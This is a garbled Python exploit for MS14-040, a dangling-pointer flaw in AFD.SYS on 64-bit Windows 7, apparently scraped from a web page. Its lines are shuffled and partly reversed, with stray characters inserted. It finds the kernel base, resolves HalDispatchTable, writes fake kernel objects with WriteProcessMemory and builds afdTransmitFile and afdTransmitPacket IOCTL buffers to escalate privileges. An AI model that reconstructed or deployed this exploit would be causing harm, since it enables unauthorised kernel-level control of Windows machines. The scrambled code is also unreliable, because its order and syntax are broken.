Kernel32.WriteProcessMemory(-1, fakeobject2addr, fakeobject2, fakeobj2size, byref(written))
Print " Print creating fakeobject at ", hex(fakeobjectaddr)įakeobject2addr = setinfoworkerfactory - 0x18įakeobject2 = "\x00"*0x18 + struct.pack("Q", firstWrite) Kernel32.WriteProcessMemory(-1, inbuf2addr, inbuf2, inbuf2size, byref(written))ĭef CreateFakeObject(firstWrite,fakeobjectaddr, setinfoworkerfactory): Print " Creating Buffer for IOCTL 0x120C3 (afdTransmitPacket) at: ", hex(inbuf2addr) WpmStatus = kernel32.WriteProcessMemory(-1, inbuf1addr, inbuf1, inbuf1size, byref(written)) Inbuf1 += "\x00" * (inbuf1size - len(inbuf1))ĭwStatus = ntdll.NtAllocateVirtualMemory(-1, Inbuf1 += struct.pack("Q", virtualAddress) #0x1a Mdlsize = (pow(2, 0x0c) * (targetsize -0x30) / 8) - 0xfff - (virtualAddress & 0xfff) Print " Creating Buffer for IOCTL 0x1207F (afdTransmitFile) at: ", hex(inbuf1addr) HalDispatchTable = kernel32.GetProcAddress(hKernel, 'HalDispatchTable') HKernel = kernel32.LoadLibraryExA(kernelver, 0, 1) (krnlbase, kernelver) = find_driver_base() If driver = None and driver_().find("krnl") != -1:Įlif driver_() = driver: Psapi.GetDeviceDriverBaseNameA(base_addr, driver_name, driver_name_size.value) Psapi.EnumDeviceDrivers(byref(lpImageBase), c_int(1024), byref(lpcbNeeded))ĭriver_name = c_char_p('\x00' * driver_name_size.value) # raise RuntimeError('python running in WOW64 is not supported') WSASocket.argtypes = (c_int, c_int, c_int, c_void_p, c_uint, DWORD)Ĭonnect.argtypes = (SOCKET, c_void_p, c_int) WSAGetLastError = windll.Ws2_32.WSAGetLastError # Vendor Homepage: # Version: Windows 7, 64 bitįrom ctypes.wintypes import HANDLE, DWORD # Exploit Title: MS14-040 - AFD.SYS Dangling Pointer
0 kommentar(er)
